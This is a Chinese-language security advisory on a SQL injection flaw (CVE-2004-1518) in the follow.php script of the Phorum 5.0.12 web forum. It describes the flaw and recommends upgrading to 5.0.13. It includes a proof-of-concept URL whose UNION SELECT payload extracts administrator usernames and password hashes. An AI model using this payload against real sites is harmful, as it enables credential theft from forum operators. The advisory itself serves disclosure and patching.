安全研究

安全漏洞
Phorum follow.php脚本远程SQL注入漏洞

发布日期:2004-11-11
更新日期:2004-11-12

受影响系统:
Phorum Phorum 5.0.12
不受影响系统:
Phorum Phorum 5.0.13
描述:
BUGTRAQ  ID: 11660
CVE(CAN) ID: CVE-2004-1518

Phorum是一款基于PHP的WEB论坛程序。

Phorum包含的'follow.php'脚本不正确过滤用户提交的URL数据,远程攻击者可以利用这个漏洞进行SQL注入攻击。

'follow.php'对"$thread" 参数缺少充分过滤,攻击者提交包含恶意SQL命令的数据作为此参数数据,可更改原来的SQL逻辑,获得敏感信息,如管理员的密码HASH数据。

<*来源:Janek Vind "waraxe" (come2waraxe@yahoo.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110021385926870&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Janek Vind "waraxe" (come2waraxe@yahoo.com)提供了如下测试方法:

http://localhost/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELEC \
T%201%2c1%2c1%2c1%2c1%2cCONCAT(username%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1% \
2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1

建议:
厂商补丁:

Phorum
------
Phorum version 5.0.13不存在此漏洞,建议用户下载使用:

http://phorum.org/downloads.php

浏览次数:3586
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障